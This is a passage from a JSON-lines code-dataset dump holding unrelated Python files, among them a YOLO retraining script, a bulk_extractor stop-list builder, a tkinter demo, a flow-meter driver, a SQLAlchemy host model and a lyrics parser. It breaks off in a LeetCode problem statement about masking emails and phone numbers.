model_body, model = create_model(anchors, class_names)\n\n train(\n model,\n class_names,\n anchors,\n imageDataGenerator_training,\n imageDataGenerator_validation\n )\n\n #draw(model_body,\n # class_names,\n # anchors,\n # imageDataGenerator_validation,\n # weights_name='trained_stage_3_best.h5',\n # save_all=False)\n\n\ndef get_classes(classes_path):\n '''loads the classes'''\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\ndef get_anchors(anchors_path):\n '''loads the anchors from a file'''\n if os.path.isfile(anchors_path):\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n else:\n Warning(\"Could not open anchors file, using default.\")\n return YOLO_ANCHORS\n\ndef process_data_new(image, boxes=None):\n '''processes the data'''\n #images = [Image.open(i).convert('RGB') for i in images]\n orig_size = np.array([image.shape[1], image.shape[0]]) # width, height\n orig_size = np.expand_dims(orig_size, axis=0) \n\n # Image preprocessing.\n processed_image = cv2.resize(image,(target_width, target_height)).astype(float)\n processed_image = processed_image / 255.\n\n #processed_images = [i.resize((target_width, target_height), Image.BICUBIC) for i in images]\n #processed_images = [np.array(image, dtype=np.float) for image in processed_images]\n #processed_images = [image/255. for image in processed_images]\n\n if boxes is not None:\n # Box preprocessing.\n # Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.\n boxes = [box.reshape((-1, 5)) for box in boxes]\n # Get extents as y_min, x_min, y_max, x_max, class for comparision with\n # model output.\n boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]\n\n # Get box parameters as x_center, y_center, box_width, box_height, class.\n boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]\n boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]\n boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]\n boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]\n boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]\n\n result = []\n for box in boxes:\n result.append(box.flatten())\n\n return processed_image, np.array(result)\n else:\n return processed_image\n\ndef process_data(images, boxes=None):\n '''processes the data'''\n images = [Image.open(i).convert('RGB') for i in images]\n orig_size = np.array([images[0].width, images[0].height])\n orig_size = np.expand_dims(orig_size, axis=0)\n\n # Image preprocessing.\n processed_images = [i.resize((target_width, target_height), Image.BICUBIC) for i in images]\n processed_images = [np.array(image, dtype=np.float) for image in processed_images]\n processed_images = [image/255. for image in processed_images]\n\n if boxes is not None:\n # Box preprocessing.\n # Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.\n boxes = [box.reshape((-1, 5)) for box in boxes]\n # Get extents as y_min, x_min, y_max, x_max, class for comparision with\n # model output.\n boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]\n\n # Get box parameters as x_center, y_center, box_width, box_height, class.\n boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]\n boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]\n boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]\n boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]\n boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]\n\n # find the max number of boxes\n max_boxes = 0\n for boxz in boxes:\n if boxz.shape[0] > max_boxes:\n max_boxes = boxz.shape[0]\n\n # add zero pad for training\n for i, boxz in enumerate(boxes):\n if boxz.shape[0] < max_boxes:\n zero_padding = np.zeros( (max_boxes-boxz.shape[0], 5), dtype=np.float32)\n boxes[i] = np.vstack((boxz, zero_padding))\n\n return np.array(processed_images), np.array(boxes)\n else:\n return np.array(processed_images)\n\n\ndef get_detector_mask(boxes, anchors):\n '''\n Precompute detectors_mask and matching_true_boxes for training.\n Detectors mask is 1 for each spatial position in the final conv layer and\n anchor that should be active for the given boxes and 0 otherwise.\n Matching true boxes gives the regression targets for the ground truth box\n that caused a detector to be active or 0 otherwise.\n '''\n detectors_mask = [0 for i in range(len(boxes))]\n matching_true_boxes = [0 for i in range(len(boxes))]\n for i, box in enumerate(boxes):\n detectors_mask[i], matching_true_boxes[i] = preprocess_true_boxes(box, anchors, [target_width, target_height])\n\n return np.array(detectors_mask), np.array(matching_true_boxes)\n\ndef create_model(anchors, class_names, load_pretrained=True, freeze_body=True):\n '''\n returns the body of the model and the model\n\n # Params:\n\n load_pretrained: whether or not to load the pretrained model or initialize all weights\n\n freeze_body: whether or not to freeze all weights except for the last layer's\n\n # Returns:\n\n model_body: YOLOv2 with new output layer\n\n model: YOLOv2 with custom loss Lambda layer\n\n '''\n\n detectors_mask_shape = (26, 26, 5, 1)\n matching_boxes_shape = (26, 26, 5, 5)\n\n # Create model input layers.\n image_input = Input(shape=(target_width, target_height, 3))\n boxes_input = Input(shape=(None, 5))\n detectors_mask_input = Input(shape=detectors_mask_shape)\n matching_boxes_input = Input(shape=matching_boxes_shape)\n\n # Create model body.\n yolo_model = yolo_body(image_input, len(anchors), len(class_names))\n topless_yolo = Model(yolo_model.input, yolo_model.layers[-2].output)\n\n if load_pretrained:\n # Save topless yolo:\n topless_yolo_path = os.path.join('model_data', 'yolo_topless.h5')\n if not os.path.exists(topless_yolo_path):\n print(\"CREATING TOPLESS WEIGHTS FILE\")\n yolo_path = os.path.join('model_data', 'yolo.h5')\n model_body = load_model(yolo_path)\n model_body = Model(model_body.inputs, model_body.layers[-2].output)\n model_body.save_weights(topless_yolo_path)\n topless_yolo.load_weights(topless_yolo_path)\n\n if freeze_body:\n for layer in topless_yolo.layers:\n layer.trainable = False\n final_layer = Conv2D(len(anchors)*(5+len(class_names)), (1, 1), activation='linear')(topless_yolo.output)\n\n model_body = Model(image_input, final_layer)\n\n # Place model loss on CPU to reduce GPU memory usage.\n with tf.device('/cpu:0'):\n # TODO: Replace Lambda with custom Keras layer for loss.\n model_loss = Lambda(\n yolo_loss,\n output_shape=(1, ),\n name='yolo_loss',\n arguments={'anchors': anchors,\n 'num_classes': len(class_names)})([\n model_body.output, boxes_input,\n detectors_mask_input, matching_boxes_input\n ])\n\n model = Model(\n [model_body.input, boxes_input, detectors_mask_input,\n matching_boxes_input], model_loss)\n\n return model_body, model\n\ndef train(model, class_names, anchors, imageDataGenerator_training, imageDataGenerator_validation):\n '''\n retrain/fine-tune the model\n\n logs training with tensorboard\n\n saves training weights in current directory\n\n best weights according to val_loss is saved as trained_stage_3_best.h5\n '''\n model.compile(\n optimizer='adam', loss={\n 'yolo_loss': lambda y_true, y_pred: y_pred\n }) # This is a hack to use the custom loss function in the last layer.\n\n\n logging_1 = TensorBoard(log_dir=\"log/log_1\")\n logging_2 = TensorBoard(log_dir=\"log/log_2\")\n logging_3 = TensorBoard(log_dir=\"log/log_3\")\n checkpoint = ModelCheckpoint(\"trained_stage_3_best.h5\", monitor='val_loss',\n save_weights_only=True, save_best_only=True)\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')\n\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_1],\n nb_epoch=10,\n validation_steps=1)\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=validation_split,\n # batch_size=32,\n # epochs=100,\n # callbacks=[logging])\n model.save_weights('trained_stage_1.h5')\n\n model_body, model = create_model(anchors, class_names, load_pretrained=False, freeze_body=False)\n\n model.load_weights('trained_stage_1.h5')\n\n model.compile(\n optimizer='adam', loss={\n 'yolo_loss': lambda y_true, y_pred: y_pred\n }) # This is a hack to use the custom loss function in the last layer.\n\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_2],\n nb_epoch=10,\n validation_steps=1)\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=0.1,\n # batch_size=8,\n # epochs=4*30,\n # callbacks=[logging])\n\n model.save_weights('trained_stage_2.h5')\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=0.1,\n # batch_size=8,\n # epochs=4*30,\n # callbacks=[logging, checkpoint, early_stopping])\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_3,checkpoint],\n nb_epoch=10,\n validation_steps=1)\n\n model.save_weights('trained_stage_3.h5')\n\n #model.save(\"YOLO_Hep.hdf5\")\n\ndef draw(model_body, class_names, anchors, image_data, image_set='val',\n weights_name='trained_stage_3_best.h5', out_path=\"output_images\", save_all=True):\n '''\n Draw bounding boxes on image data\n '''\n\n # model.load_weights(weights_name)\n #print(image_data.shape)\n model_body.load_weights(weights_name)\n\n # Create output variables for prediction.\n yolo_outputs = yolo_head(model_body.output, anchors, len(class_names))\n input_image_shape = K.placeholder(shape=(2, ))\n boxes, scores, classes = yolo_eval(\n yolo_outputs, input_image_shape, score_threshold=0.07, iou_threshold=0)\n\n # Run prediction on overfit image.\n sess = K.get_session() # TODO: Remove dependence on Tensorflow session.\n\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n for i in range(len(image_data)):\n out_boxes, out_scores, out_classes = sess.run(\n [boxes, scores, classes],\n feed_dict={\n model_body.input: image_data[i],\n input_image_shape: [image_data.shape[2], image_data.shape[3]],\n K.learning_phase(): 0\n })\n print('Found {} boxes for image.'.format(len(out_boxes)))\n print(out_boxes)\n\n # Plot image with predicted boxes.\n image_with_boxes = draw_boxes(image_data[i][0], out_boxes, out_classes,\n class_names, out_scores)\n # Save the image:\n if save_all or (len(out_boxes) > 0):\n image = Image.fromarray(image_with_boxes)\n image.save(os.path.join(out_path,str(i)+'.png'))\n\n # To display (pauses the program):\n # plt.imshow(image_with_boxes, interpolation='nearest')\n # plt.show()\n\n\n\nif __name__ == '__main__':\n args = argparser.parse_args()\n _main(args)\n","sub_path":"retrain_yolo.py","file_name":"retrain_yolo.py","file_ext":"py","file_size_in_byte":26611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481378210","text":"#!/usr/bin/python\n#\n# Read one or more output directories and create a single stop list.\n# Outputs as both a stop list and as a cdb data file\n\nimport sys\nif sys.version_info < (3,1):\n raise RuntimeError(\"idiffernece.py now requires Python 3.1 or above\")\n\nimport glob,re,os\nfrom subprocess import call,Popen,PIPE\n\nfeature_files = ['ccn.txt','domain.txt','email.txt','exif.txt', 'rfc822.txt','telephone.txt','url.txt','zip.txt']\n\ndef create_stop_list(featuredir,ofn):\n global options\n\n def process_file(fname):\n print(\"processing\",fname)\n for line in open(fname,'rb'):\n if line[0]==b'#': continue\n if line[0:2]==b'n=': continue\n try:\n (offset,word,context) = line.split(b'\\t')\n stop_list[context.strip()] = fname\n except ValueError:\n pass\n\n stop_list = {}\n for (dirpath,dirnames,filenames) in os.walk(featuredir):\n for filename in filenames:\n if filename in feature_files:\n process_file(os.path.join(dirpath,filename))\n\n f = open(ofn,\"wb\")\n for key in sorted(stop_list.keys()):\n f.write(key)\n f.write(b'\\t')\n f.write(stop_list[key].encode('utf-8'))\n f.write(b'\\n')\n\nif __name__==\"__main__\":\n from optparse import OptionParser\n global options\n\n parser = OptionParser()\n parser.add_option(\"--wipe\",action=\"store_true\",default=False)\n parser.usage = \"\"\"\"usage: %prog [options] output-file.txt\\n\nEither process the virtual machines in [vmdir] or recursively read the feature files in [featuredir]\nand write to a context stop list for use with bulk_extractor.\"\"\"\n parser.add_option(\"--vmdir\",help=\"specifies a directory of virtual machines on which bulk_extractor should be run\")\n parser.add_option(\"--featuredir\",help=\"specifies the directory of output files for bulk_extractor and input dirs this program\")\n parser.add_option(\"--bulk_extractor\",help=\"specifies bulk_extractor executable to use\",default=\"bulk_extractor\")\n (options,args) = parser.parse_args()\n\n if len(args)==0:\n parser.print_help()\n exit(0)\n\n if options.vmdir:\n print(\"Running Bulk Extractor...\")\n vms = glob.glob(options.vmdir + \"/*/*-flat.vmdk\")\n os.mkdir(options.featuredir)\n for vm in vms:\n outname = os.path.join(options.featuredir,re.search(\"/([^/]*)-(tpl|flat)\",vm).group(1))\n cmd = [options.bulk_extractor,'-o',outname,vm]\n print(\"\\n\\n\\n\")\n print(\"Image {0} of {1}\".format(vms.index(vm),len(vm)))\n print(\" \".join(cmd))\n call(cmd)\n\n print(\"Creating stop list from\",options.featuredir)\n create_stop_list(options.featuredir,args[0])\n exit(0)\n \n \n\n\n\n \n\n\n\n\n","sub_path":"python/make_context_stop_list.py","file_name":"make_context_stop_list.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439266022","text":"\"\"\"Default configuration\n\nUse env var to override\n\"\"\"\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nDEBUG = True\nSECRET_KEY = os.getenv('SECRET_KEY')\n\nSQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nJSON_AS_ASCII = False\n\nJWT_BLACKLIST_ENABLED = True\nJWT_BLACKLIST_TOKEN_CHECKS = ['access', 'refresh']\n","sub_path":"{{cookiecutter.project_name}}/{{cookiecutter.app_name}}/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494436135","text":"try:\n import tkinter\nexcept ImportError:\n import Tkinter as tkinter\n\n#print (tkinter.TkVersion)\n#print (tkinter.TclVersion)\n#tkinter._test()\n\nmainWindow = tkinter.Tk()\nmainWindow.title(\"Test Program\")\nmainWindow.geometry('640x480+980+200') #width height right down\n\nlabel= tkinter.Label(mainWindow,text= \"Test Program\")\n\nlabel.pack(side = 'top')\n\nleftFrame = tkinter.Frame(mainWindow)\nleftFrame.pack(side = 'left', anchor='n', fill = tkinter.Y, expand = False)\n\ncanvas = tkinter.Canvas(leftFrame, relief = 'raised', borderwidth = 1)\ncanvas.pack(side = 'left', anchor='n')\n\nrightFrame = tkinter.Frame(mainWindow)\nrightFrame.pack(side='right', anchor='n', expand=True)\n\n\nbutton1 = tkinter.Button(rightFrame, text = 'Button 1')\nbutton2 = tkinter.Button(rightFrame, text = 'Button 2')\nbutton3 = tkinter.Button(rightFrame, text = 'Button 3')\n\nbutton1.pack(side = 'top', anchor = 'n')\nbutton2.pack(side = 'top', anchor= 's')\nbutton3.pack(side = 'top', anchor = 'e')\n\n\n\n\nmainWindow.mainloop()\n\n","sub_path":"test/tkinterdemo.py","file_name":"tkinterdemo.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381644135","text":"import RPi.GPIO as GPIO\nimport atexit\nimport time\n\n\nclass FlowMeter:\n\n POUR_TIMEOUT = 3000\n\n _pouring = False\n _pour_count = 0\n _pour_start = 0\n _pour_last_pulse = int(time.time() * 1000)\n\n def __init__(self, pin, record_callback):\n if not pin:\n raise Exception('GPIO pin must be defined.')\n\n self._record_callback = record_callback\n\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(pin, GPIO.FALLING, callback=self._handle_pulse)\n\n # Make sure to cleanup GPIO\n atexit.register(GPIO.cleanup)\n\n def _handle_pulse(self, channel):\n current_time = int(time.time() * 1000)\n self._check_pour_status(current_time)\n\n self._pour_count = self._pour_count + 1\n self._pour_last_pulse = current_time\n\n def _check_pour_status(self, current_time):\n pour_delta = current_time - self._pour_last_pulse\n\n if pour_delta > self.POUR_TIMEOUT:\n self._record_callback(self._pour_start,\n self._pour_last_pulse,\n self._pour_count)\n self._new_pour()\n\n def _new_pour(self):\n self._pouring = True\n self._pour_count = 1\n self._pour_start = int(time.time() * 1000)\n","sub_path":"sidekeg/flow_meter.py","file_name":"flow_meter.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285765572","text":"import asyncio\nfrom contextlib import contextmanager\nfrom threading import Thread\nfrom time import sleep\n\n\n@contextmanager\ndef assert_done_after(seconds):\n sleeper = Sleeper()\n sleeper.sleep_for(seconds)\n yield sleeper\n assert sleeper.done\n\n\nclass Sleeper:\n done = False\n\n def sleep_for(self, start):\n Thread(target=self._wake_up_after, args=(start,)).start()\n\n def _wake_up_after(self, seconds):\n sleep(seconds)\n self.done = True\n\n\nclass AsyncSleeper:\n SLEEP_DURATION = 0.5\n\n def __init__(self):\n self.awake = False\n\n async def sleep_for_a_bit(self):\n await asyncio.sleep(self.SLEEP_DURATION)\n self.awake = True\n\n async def get_awake_with_delay(self, delay_sec):\n awake = self.awake\n await asyncio.sleep(delay_sec)\n return awake\n","sub_path":"tests/sleeper.py","file_name":"sleeper.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538044067","text":"import serial\n\nclass Vehicle:\n def __init__(self, port, baudrate):\n self.ser = serial.Serial(port, baudrate=baudrate)\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.ser.close() \n\n def move_alt(self, cmd, delta_speed, delta_turn):\n if(len(cmd) != 4):\n print(\"Expected 4 arguments: forward, backward, left and right\")\n return\n \n speed_val = 250\n turn_val = 250\n forward, backward, left, right = cmd\n \n if(forward == '1'):\n speed_val += delta_speed\n elif(backward == '1'):\n speed_val -= delta_speed\n if(left == '1'):\n turn_val -= delta_turn\n elif(right == '1'):\n turn_val += delta_turn\n self.move(speed_val, turn_val)\n\n def move(self, speed, turn):\n \"\"\" Sets vehicle's speed and steering angle. Both variables are in the range of [0, 500].\n Speed:\n - 0: Go backwards at maximum speed\n - 250: Break\n - 500: Go forwards at maximum speed\n Turn:\n - 0: Turn left (max)\n - 250: Straight\n - 500: Turn right (max)\n \"\"\"\n if(speed < 0 or speed > 500 or turn < 0 or turn > 500):\n print(\"Speed and turn must be within [0, 500] range\")\n return\n\n cmd1 = 'y1' + '{:0>3d}'.format(speed) + '!'\n cmd2 = 'y2' + '{:0>3d}'.format(turn) + '!'\n self.ser.write(cmd1.encode('ascii'))\n self.ser.write(cmd2.encode('ascii'))\n\n def reset(self):\n self.move(250, 250)","sub_path":"build/realworld/odroid/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19756496","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('main-page', views.main_page, name='main'),\n path('about-me', views.page_about_me, name='about_me'),\n path('skills', views.page_skills, name='page_skills'),\n path('causes', views.page_cause, name='page_causes'),\n path('feedback', views.FeedbackCreateView.as_view(), name='feedback'),\n]","sub_path":"web_site/employers_feedback/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"600257405","text":"#!/usr/bin/env python\nimport time\nimport tqdm\nimport argparse\nimport os\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom image_utils import similarity\n\nPREDICTION_LENGTH = 4096\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-f\", \"--file\", default=\"/usr/src/app/files/files-urls.csv\", type=str, help=\"path to CSV file (default: /usr/src/app/files/files-urls.csv)\")\nparser.add_argument(\"-p\", \"--predictions_folder\", default=\"/usr/src/app/files/predictions\", type=str, help=\"Folder where predictions are located (default: /usr/src/app/files/predictions)\")\nparser.add_argument(\"-d\", \"--destination\", default=\"/usr/src/app/files/similarities\", type=str, help=\"Folder where to save results. Multiple files for each process will be created. (default: /usr/src/app/files/similarities)\")\nparser.add_argument('--overwrite', action='store_true', help='Overwrite existing files if they exist')\n\nargs = parser.parse_args()\n\nfile = args.file\npredictions_folder = args.predictions_folder\ndestination = args.destination\noverwrite = args.overwrite\n\nif (not os.path.exists(file)):\n print(\"File %s does not exist.\" % file)\n exit()\n\nif (not os.path.exists(predictions_folder)):\n print(\"Folder %s does not exist.\" % predictions_folder)\n exit()\n\nif (not os.path.exists(destination)):\n print(\"Folder %s does not exist.\" % destination)\n exit()\n\n# get the base name for output file creation\nfullname = os.path.basename(file)\nbase = os.path.splitext(fullname)[0]\npca_filename = \"%s/%s_pca.p\" % (destination, base)\numap_filename = \"%s/%s_umap.p\" % (destination, base)\noutput_filename = \"%s/%s.txt\" % (destination, base)\n\nstarttime = time.time()\n\nurl_df = pd.read_csv(file, index_col=\"access_pid\")\n\ncount = len(url_df.filename)\n\nprint(\"Getting similarity for %s files.\" % count)\n\ndef skip_row(id, features, skipped):\n skipped.append(id)\n features.append(np.zeros(shape=(PREDICTION_LENGTH,)))\n return features, skipped\n\ndef load_predictions():\n skipped = []\n features = []\n for access_pid, row in tqdm.tqdm(url_df.iterrows(), total=count):\n id = row['id']\n predictions_file = \"%s/%s.json.gz\" % (predictions_folder, id)\n if (not os.path.exists(predictions_file)):\n # no predictions for this file\n features, skipped = skip_row(id, features, skipped)\n else:\n try:\n # TODO: this seems to be printing info even though it's in try/except\n predictions = np.loadtxt(predictions_file)\n if (len(predictions) == PREDICTION_LENGTH):\n features.append(predictions)\n else:\n # wrong file length\n features, skipped = skip_row(id, features, skipped)\n except OSError:\n # the zip was corrupt\n features, skipped = skip_row(id, features, skipped)\n if (len(skipped) > 0):\n print(\"Skipped %s files:\" % len(skipped))\n print(skipped)\n return features\n\npca_exists = os.path.exists(pca_filename)\numap_exists = os.path.exists(umap_filename)\noutput_exists = os.path.exists(output_filename)\n\ndef do_pca(features):\n features = np.array(features)\n pca_features, pca = similarity.transform_features(features)\n if (not pca_exists or overwrite):\n pickle.dump([url_df, pca_features, pca], open(pca_filename, 'wb'))\n return pca_features, pca\n\ndef do_umap(pca_features):\n umap_features, tx, ty = similarity.umap_ify(pca_features)\n if (not umap_exists or overwrite):\n pickle.dump([umap_features, tx, ty], open(umap_filename, 'wb'))\n return umap_features, tx, ty\n\ndef do_similarity(features):\n # we don't ask if it exists because then what's the point of running this file?\n count = len(features)\n grid, nx, ny = similarity.rasterize_umap(features, count)\n # put the width/height info in the first row of the grid\n grid = np.insert(grid, 0, [nx, ny], axis=0)\n np.savetxt(output_filename, grid, fmt='%u')\n\nif (overwrite or (not pca_exists and not umap_exists)):\n features = load_predictions()\n pca_features, pca = do_pca(features)\n umap_features, tx, ty = do_umap(pca_features)\nelse:\n # first do pca\n if (pca_exists):\n print(\"loaded pca %s\" % pca_filename)\n url_df, pca_features, pca = pickle.load(open(pca_filename, 'rb'))\n else:\n features = load_predictions()\n pca_features, pca = do_pca(features)\n # now umap\n if (umap_exists):\n print(\"loaded umap %s\" % umap_filename)\n umap_features, tx, ty = pickle.load(open(umap_filename, 'rb'))\n else:\n umap_features, tx, ty = do_umap(pca_features)\n # now rasterize\n do_similarity(umap_features)\n\nprint(\"Processed %s files in {} seconds\".format(time.time() - starttime) % count)\n","sub_path":"similar_csv.py","file_name":"similar_csv.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324098627","text":"from db import db\nfrom models.mixins.CoreMixin import CoreMixin\nfrom utils.api_error import FormError\nfrom utils.request_utils import Serializer\nfrom utils.validation_utils import type_name, type_email, type_phone, type_city_or_state, max_length, required_length, \\\n type_zip_code, one_of, type_bool, min_length\nfrom utils.validation_utils import validate\n\nHNT = 'hnt'\nBANK_ACCOUNT = 'bank_account'\nVENMO = 'venmo'\n\n\nclass Host(db.Model, CoreMixin, Serializer):\n first_name = db.Column(db.String(80), nullable=False)\n last_name = db.Column(db.String(120), nullable=False)\n email = db.Column(db.String(120), unique=True, nullable=False)\n phone = db.Column(db.String(120), nullable=False)\n street = db.Column(db.String(120), nullable=False)\n city = db.Column(db.String(120), nullable=False)\n state = db.Column(db.String(120), nullable=False)\n zip = db.Column(db.String(120), nullable=False)\n w9_received = db.Column(db.Boolean, server_default='false', nullable=False)\n payment_method = db.Column(db.String(120), server_default=HNT, nullable=False)\n hnt_wallet = db.Column(db.String(120))\n bank_account_number = db.Column(db.String(120))\n bank_routing_number = db.Column(db.String(120))\n venmo_handle = db.Column(db.String(120))\n\n host_assignments = db.relationship(\"Assignment\", backref=\"host\", foreign_keys='Assignment.host_id')\n referral_assignments = db.relationship(\"Assignment\", backref=\"referer\", foreign_keys='Assignment.referer_id')\n host_invoices = db.relationship('HostInvoice', backref='host')\n\n validation = {\n 'first_name': [type_name],\n 'last_name': [type_name],\n 'email': [type_email],\n 'phone': [type_phone],\n 'street': [max_length(120)],\n 'city': [type_city_or_state],\n 'state': [type_city_or_state],\n 'zip': [type_zip_code],\n 'w9_received': [type_bool],\n 'payment_method': [one_of([HNT, BANK_ACCOUNT, VENMO])],\n 'hnt_wallet': [min_length(50), max_length(52)],\n 'bank_account_number': [min_length(6), max_length(24)],\n 'bank_routing_number': [min_length(6), max_length(24)],\n 'venmo_handle': [],\n }\n\n def serialize(self):\n return {'first_name': self.first_name,\n 'last_name': self.last_name,\n 'email': self.email,\n 'phone': self.phone,\n 'street': self.street,\n 'city': self.city,\n 'state': self.state,\n 'zip': self.zip,\n 'hnt_wallet': self.hnt_wallet,\n 'w9_received': self.w9_received,\n 'payment_method': self.payment_method,\n 'bank_account_number': self.bank_account_number,\n 'bank_routing_number': self.bank_routing_number,\n 'venmo_handle': self.venmo_handle,\n 'id': self.id\n }\n\n def eligible_to_be_referred(self, assignment_being_edited_id):\n # if the host has never had an assignment\n if self.host_assignments is None or not len(self.host_assignments): return True\n\n # if the host being referred has only one active assignment and it is the one being edited\n if len(self.host_assignments) == 1 and \\\n self.host_assignments[0].is_active() and \\\n str(self.host_assignments[0].id) == str(assignment_being_edited_id):\n return True\n\n return False\n\n @staticmethod\n def make_new(data):\n if Host.email_in_use(data): raise FormError('host with the provided email already exists')\n\n validate(data, Host.validation)\n\n # noinspection PyArgumentList\n h = Host(email=data['email'],\n first_name=data['first_name'],\n last_name=data['last_name'],\n phone=data['phone'],\n street=data['street'],\n city=data['city'],\n state=data['state'],\n zip=data['zip'],\n payment_method=data['payment_method'])\n\n return Host.host_payment_details(h, data)\n\n @staticmethod\n def update(data):\n validate(data, Host.validation)\n h = Host.query.get(data['id'])\n\n h.email = data['email'],\n h.first_name = data['first_name']\n h.last_name = data['last_name']\n h.phone = data['phone']\n h.street = data['street']\n h.city = data['city']\n h.state = data['state']\n h.zip = data['zip']\n h.w9_received = data['w9_received']\n h.payment_method = data['payment_method'] # changes apply to entire month\n\n Host.host_payment_details(h, data)\n db.session.commit()\n\n @staticmethod\n def by_id(host_id):\n return Host.query.get(host_id)\n\n @staticmethod\n def email_in_use(data):\n return Host.query.filter_by(email=data['email']).first()\n\n # TODO: shouldn't be static\n @staticmethod\n def host_payment_details(_host, data):\n method = data['payment_method']\n\n if method == HNT:\n _host.hnt_wallet = data['hnt_wallet']\n if method == BANK_ACCOUNT:\n _host.bank_account_number = data['bank_account_number']\n _host.bank_routing_number = data['bank_routing_number']\n if method == VENMO:\n _host.venmo_handle = data['venmo_handle']\n return _host\n","sub_path":"models/Host.py","file_name":"Host.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612577382","text":"import re\n\nfrom domains import Domain\n\nurl = 'https://genius.com'\n\n\nclass Genius(Domain):\n\n def __init__(self):\n super().__init__(url)\n\n def _parse(self, body: str):\n hrefRegex = re.compile('^()', re.S | re.M)\n\n for href in re.findall(hrefRegex, body):\n body = body.replace(href, '')\n\n return body.replace('
', '').replace('', '')\n\n def parse(self, html):\n bodyRegex = re.compile('

(.+?)

', flags=re.S | re.M)\n\n try:\n body = next(re.finditer(bodyRegex, html)).group(1)\n except StopIteration:\n return None\n\n data = self._parse(body)\n return data\n","sub_path":"domains/genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526426496","text":"\"\"\"\r\n831. 隐藏个人信息\r\n\r\n给你一条个人信息 string S,它可能是一个邮箱地址,也可能是一个电话号码。\r\n\r\n我们将隐藏它的隐私信息,通过如下规则:\r\n\r\n1. 电子邮箱\r\n定义名称 的长度大于2,并且只包含小写字母 a-z 和大写字母 A-Z。\r\n电子邮箱地址由名称 开头,紧接着是符号 '@',后面接着一个名称 ,再接着一个点号 '.',\r\n然后是一个名称 。电子邮箱地址确定为有效的,并且格式是\"name1@name2.name3\"。\r\n为了隐藏电子邮箱,所有的名称 必须被转换成小写的,\r\n并且第一个名称 的第一个字母和最后一个字母的中间的所有字母由 5 个 '*' 代替。\r\n\r\n2. 电话号码\r\n电话号码是一串包括数组 0-9,以及 {'+', '-', '(', ')', ' '} 这几个字符的字符串。\r\n你可以假设电话号码包含 10 到 13 个数字。\r\n电话号码的最后 10 个数字组成本地号码,在这之前的数字组成国际号码。注意,国际号码是可选的。\r\n我们只暴露最后 4 个数字并隐藏所有其他数字。\r\n本地号码是有格式的,并且如 \"***-***-1111\" 这样显示,这里的 1 表示暴露的数字。\r\n为了隐藏有国际号码的电话号码,像 \"+111 111 111 1111\",我们以 \"+***-***-***-1111\" 的格式来显示。\r\n在本地号码前面的 '+' 号和第一个 '-' 